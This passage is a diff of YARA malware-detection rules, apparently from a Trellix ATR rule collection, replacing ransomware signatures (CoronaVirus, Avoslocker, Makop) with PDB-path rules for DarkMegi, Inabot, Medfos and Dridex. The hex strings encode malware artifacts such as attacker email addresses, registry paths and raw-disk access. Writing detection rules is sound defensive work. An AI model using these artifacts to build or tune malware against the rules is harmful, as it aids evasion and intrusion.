{7C787B386177B4D7F1F6B9E6FE17154FF15BD9E3F1DA94A1E1064654E7500A0B86A20A4AA16BD4E16F19A8733960DE868F10F382CDEEC1F15CE718839241DA10} - $11 = {2C3C6F6B2E597AC746FF7664087C7E899ABCC27AC60FA545D9CF4323063896D299F57132FE3E63E567EBFADF296365A1B2C0163DD8A4F3DABA04C77FA39A99CB} - $12 = {7B3C5D7C73D34D1A6C66B91990D162CACD89ECEAF591AC56C95AB3151EBAC1687FB749924B7BC27917FE50CA6C1417FEDBCC5BA2B7C03B1AEE4F5732E69DAC14} - $13 = {406357775C42584F11A1610D3A8A31F094FA252BC3E10738BD310D536D3A2F9EC5C21996AC4DCF5237AE3A4467D5678EE2983E4282ADFB1FDEA16352109BA7A7} - $14 = {2F265663680CACC66731B11AA78D588D7B54AC06C6348905D6B8F52C608D8208B0C6C5F1C11A2F69608D363DFA2A365AA387DAFCC906B486548F3DA8FE36312E} - $15 = {2B37480D634C799C468B775404368C7B891ADE3A556DF888566EB8CB3ED6F0171B59C35BB57F3B75D9017B7C9D52D1E87F48795AA58A16695B98BAFEAF66A769} - $16 = {0A76372D4F488ED5649A19B42E9E42B1DCC2E62655E7041711A6235B825D791CD6519492309D46964594F78B1DCAD17A5BEA574166B8A8EB76A52CA1052D724A} - $17 = {3D0B635F789C6CA6ADAC549548AA509C99D0C8DD823C99704423B90175B062E70EBBA67F937D622FF41B59D21E763A26D36759F3297D12B7454D82676C5B7B4A} - $18 = {225B642B7A09E7B06A4D3B95D97927AC46DABAE3ECE93AA4B307259DB9C01361C905B240678DB830EB7E172EB939ECB188ED3504B3709A746772B7BC94C83FB6} - $19 = {27465E49761EECAF449A3AB147907CF1C3D5F161D353E236BF9940AEC099EA4AC0352576803626029A15B3E978AB84D0024A1E345FFE58A81CDA2FBD61408971} - $20 = {3B7431210BEE4762B447DF044B5D6F41D53824C3E2CD17A35D71029352B47DA3811C60458EAADEBA532F75C54A3DDFC74AB3BEA7A51AF81A4A688F5D7A10378C} - $21 = {276C41453F8F2D8279980EAD3328E2478A3D84C55EB668231A12EED150E496622FCB2C04D9CBCE257BD97B9ECE404037589A185573F936A78DA88AD43EFC3948} - $22 = {2727495F5B1B4D920E35A52B6A5DB6A7F8B31A26873E20C53388696567D692B4B1F4A0B9267E4BBDA1728A5E883FD69029A07669AC1D0DC22E3157C028705C19} - $23 = {3E5552672C26C4F22824AF196F222D370F9EEDBEF119B8C3DD96414CF3529912234CB08AA7B2A034A51635319EAC44D47FA68747BA4B2FD2A884373ADEFB5C84} - $24 = {20735E632C6C70375BCA935EE39B7FA508205E9CC034CBD193A0D1C1E3A9A13818B9EB7FEFB11891E71221DB7143286C7D36A91C1FF7615E38F02E5C1BA24AFF} - $25 = {0A3D69344860D944AA8A46908019AB085E025AA693D381A34D8DCF116B25B0C62355D93893D1F64B983986C7E956C22303A9AB109680BF4B74460C5B087412AF} - $26 = {7C5B79652BC66C9BC36B11730D556FFA1CA1616CA59C0C344FD1F6B50C9C259329D699CDF0B894F1540AFDC4F431957206B0748AB6AE3B9069CD91147E09709B} - $27 = {2257442B42DB79A5E6CAD745E9A8D9775E4216C95F6094A05F05D7DAADBB03EC4B3444983DD291C2E32FC39299BCB4D22219386E75DAABB8D2EA93DFC52A248B} - $28 = {3C0D4A68792594D2F23F10A465B38B75D272318CA0E532A8A183F8CE5DEE6B45ECFDC96E4FF9158832472ED8CDFA69F92868A503F821D848CBB97B58332D8F84} + $pdb = "\\IntergrateCHK\\Release\\IntergrateCHK.pdb" condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and filesize <600KB and any of them } -rule TRELLIX_ARC_Installer_Coronavirus : RANSOMWARE FILE +rule TRELLIX_ARC_Downloader_Darkmegi_Pdb : DOWNLOADER FILE { meta: - description = "Rule to detect the Corona Virus Installer" + description = "Rule to detect DarkMegi downloader based on PDB" author = "Marc Rivero | McAfee ATR Team" - id = "2a224529-bfc7-57ed-91c3-426cae4b7895" - date = "2020-03-25" + id = "3ccc3685-e05b-5620-9198-24733fb1e7eb" + date = "2013-03-06" modified = "2020-08-14" - reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_coronavirus.yar#L1-L41" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_downloader_darkmegi.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "5987a6e42c3412086b7c9067dc25f1aaa659b2b123581899e9df92cb7907a3ed" - logic_hash = "26be8bbfbf615967cc2a0e2d4179cd5f444c53f170a681d2ec236244881dc629" + hash = "bf849b1e8f170142176d2a3b4f0f34b40c16d0870833569824809b5c65b99fc1" + logic_hash = "47faf8c5296e651f82726a6e8a7843dfa0f98e7be7257d2c03efcff550f52140" score = 75 - quality = 62 - tags = "RANSOMWARE, FILE" + quality = 70 + tags = "DOWNLOADER, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/CoronaVirus" + malware_type = "downloader" + malware_family = "Downloader:W32/DarkMegi" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = { 61 63 68 65 6C 6C 69 65 73 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D } - $s2 = { 74 6F 6A 65 6E 2E 6D 65 40 67 6D 61 69 6C 2E 63 6F 6D } - $s4 = { 77 61 6E 67 63 68 79 7A 40 67 6D 61 69 6C 2E 63 6F 6D } - $s5 = { 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 74 00 69 00 70 00 6F 00 73 00 20 00 64 00 65 00 20 00 69 00 6D 00 61 00 67 00 65 00 6E 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 3B 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 77 00 6D 00 66 00 7C 00 4D 00 61 00 70 00 61 00 73 00 20 00 64 00 65 00 20 00 62 00 69 00 74 00 73 00 20 00 28 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 29 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 7C 00 49 00 63 00 6F 00 6E 00 6F 00 73 00 2F 00 63 00 75 00 72 00 73 00 6F 00 72 00 65 00 73 00 20 00 28 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 29 00 7C 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 7C 00 4D 00 65 00 74 00 61 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 29 00 7C 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 7C 00 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 2A 00 29 00 7C 00 2A 00 2E 00 2A 00 7C 00 7C 00 } - $s6 = { 48 00 54 00 4D 00 4C 00 5F 00 49 00 4D 00 47 00 23 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 4C 00 49 00 5F 00 43 00 41 00 50 00 54 00 49 00 4F 00 4E 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 29 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 53 00 42 00 5F 00 48 00 5F 00 53 00 43 00 52 00 4F 00 4C 00 4C 00 5F 00 50 00 52 00 45 00 56 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 31 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 4F 00 52 00 41 00 4E 00 47 00 45 00 5F 00 43 00 4C 00 4F 00 53 00 45 00 5F 00 50 00 4E 00 47 00 32 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 50 00 41 00 49 00 44 00 5F 00 53 00 45 00 54 00 54 00 49 00 4E 00 47 00 53 00 5F 00 50 00 4E 00 47 00 } - $s7 = { 25 73 5C 6C 6F 67 5F 25 30 34 64 25 30 32 64 25 30 32 64 5F 25 64 2E 6C 6F 67 } + $pdb = "\\RKTDOW~1\\RKTDRI~1\\RKTDRI~1\\objchk\\i386\\RktDriver.pdb" condition: - uint16(0)==0x5a4d and filesize <3000KB and all of them + uint16(0)==0x5a4d and filesize >20000KB and any of them } -rule TRELLIX_ARC_Ransomware_Coronavirus : RANSOMWARE FILE +rule TRELLIX_ARC_Malw_Inabot_Worm : WORM FILE { meta: - description = "Rule to detect the Corona Virus ransomware" + description = "Rule to detect inabot worm based on PDB" author = "Marc Rivero | McAfee ATR Team" - id = "4195a57b-cd51-5050-861a-6436f7ec4eca" - date = "2020-03-25" + id = "b899d2d6-000a-5363-9efe-527dcd0cea17" + date = "2013-04-19" modified = "2020-08-14" - reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_coronavirus.yar#L43-L80" + reference = "http://verwijderspyware.blogspot.com/2013/04/elimineren-w32inabot-worm-hoe-te.html" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_inabot_worm_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "3299f07bc0711b3587fe8a1c6bf3ee6bcbc14cb775f64b28a61d72ebcb8968d3" - logic_hash = "2a7e1676a20f30b0cb0321579bb85e4836e2aee5f56b838d2ff2bec7a08c489f" + hash = "c9c010228254aae222e31c669dda639cdd30695729b8ef2b6ece06d899a496aa" + logic_hash = "70485de4e071b684faa87484ce2a53a8b2a29d0a2954e785b858c7ff1d908de0" score = 75 - quality = 64 - tags = "RANSOMWARE, FILE" + quality = 70 + tags = "WORM, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/CoronaVirus" + malware_type = "worm" + malware_family = "Worm:W32/Inabot" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = { 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 } - $s2 = { 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 } - $s3 = { 2F 00 75 00 70 00 6C 00 6F 00 61 00 64 00 2F 00 25 00 73 00 5F 00 25 00 64 00 5F 00 25 00 73 00 } - $s4 = { 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 43 6F 6E 74 72 6F 6C 5C 53 65 73 73 69 6F 6E 20 4D 61 6E 61 67 65 72 } - $s5 = { 5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 } + $pdb = "\\trasser\\portland.pdb" + $pdb1 = "\\mainstream\\archive.pdb" condition: - uint16(0)==0x5a4d and filesize <100KB and all of them + uint16(0)==0x5a4d and filesize <180KB and any of them } -import "pe" - -rule TRELLIX_ARC_Ransom_Avoslocker : FILE +rule TRELLIX_ARC_Malw_Medfos : TROJAN FILE { meta: - description = "Rule to detect Avoslocker Ransomware" - author = "CB @ ATR" - id = "50f029c8-154e-583d-8264-8d86d01075f6" - date = "2021-07-22" - modified = "2021-07-22" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Avoslocker.yar#L3-L27" + description = "Rule to detect Medfos trojan based on PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "07ad0227-ca8f-5071-8ef7-8c3e087fcc35" + date = "2013-04-19" + modified = "2020-08-14" + reference = "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=win32%2Fmedfos" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_medfos_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "316aaab225797eedd62f9cfde1fdbd799a10441b3b15a8abc76141b57b36b1d3" + hash = "3582e242f62598445ca297c389cae532613afccf48b16e9c1dcf1bfedaa6e14f" + logic_hash = "1726462a806f5cb3f0b80596623cebc51a7a9f866ded0cb59ea1c43034ce2819" score = 75 quality = 70 - tags = "FILE" - Version = "v1" - DetectionName = "Ransom_Win_Avoslocker" - hash1 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f" - hash2 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856" + tags = "TROJAN, FILE" + rule_version = "v1" + malware_type = "trojan" + malware_family = "Trojan:W32/Medfos" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $v1 = "CryptImportPublicKeyInfo failed. error: %d" fullword ascii - $v2 = "CryptStringToBinary failed. Err: %d" fullword ascii - $v3 = "encrypting %ls failed" fullword wide - $v4 = "CryptDecodeObjectEx 1 failed. Err: %p" fullword ascii - $v5 = "operator co_await" fullword ascii - $v6 = "drive %s took %f seconds" fullword ascii - $seq0 = { 8d 4e 04 5e e9 b1 ff ff ff 55 8b ec ff 75 08 ff } - $seq1 = { 33 c0 80 fb 2d 0f 94 c0 05 ff ff ff 7f eb 02 f7 } - $seq2 = { 8b 40 0c 89 85 1c ff ff ff 8b 40 0c 89 85 18 ff } + $pdb = "\\som\\bytguqne\\jzexsaf\\gyin.pdb" condition: - ( uint16(0)==0x5a4d and filesize <1000KB and pe.imphash()=="a24c2b5bf84a5465eb75f1e6aa8c1eec" and (5 of them ) and all of ($seq*)) or ( all of them ) + uint16(0)==0x5a4d and filesize <150KB and any of them } -rule TRELLIX_ARC_RANSOM_Makop : RANSOMWARE FILE +rule TRELLIX_ARC_Dridex_P2P_Pdb : BACKDOOR FILE { meta: - description = "Rule to detect the unpacked Makop ransomware samples" + description = "Rule to detect Dridex P2P based on the PDB" author = "Marc Rivero | McAfee ATR Team" - id = "2828f2f9-4702-5cef-8b4e-7e98146c0332" - date = "2020-07-19" + id = "57350c96-877e-57de-9465-df9f7eb6d656" + date = "2014-11-29" modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_makop.yar#L1-L32" + reference = "https://www.us-cert.gov/ncas/alerts/aa19-339a" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_dridex_p2p_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "008e4c327875110b96deef1dd8ef65cefa201fef60ca1cbb9ab51b5304e66fe1" - logic_hash = "2b4f8b90d46530421b66dbb04df6e84d268709fbee884536d8acc91e1b85f8a4" + hash = "5345a9405212f3b8ef565d5d793e407ae8db964865a85c97e096295ba3f39a78" + logic_hash = "c9c4db48435203cdb882eef8082efd8424bd13f1aa512cfb3082f365b9bc6e83" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Makop" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Dridex" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pattern_0 = { 50 8d7c2420 e8???????? 84c0 0f84a6020000 8b742460 ba???????? } - $pattern_1 = { 51 52 53 ffd5 85c0 746d 8b4c240c } - $pattern_2 = { 7521 68000000f0 6a18 6a00 6a00 56 ff15???????? } - $pattern_3 = { 83c40c 8d4e0c 51 66c7060802 66c746041066 c6460820 } - $pattern_4 = { 51 ffd3 50 ffd7 8b4628 85c0 } - $pattern_5 = { 85c9 741e 8b4508 8b4d0c 8a11 } - $pattern_6 = { 83c002 6685c9 75f5 2bc6 d1f8 66390c46 8d3446 } - $pattern_7 = { 895a2c 8b7f04 85ff 0f85f7feffff 55 6a00 } - $pattern_8 = { 8b3d???????? 6a01 6a00 ffd7 50 ff15???????? } - $pattern_9 = { 85c0 7407 50 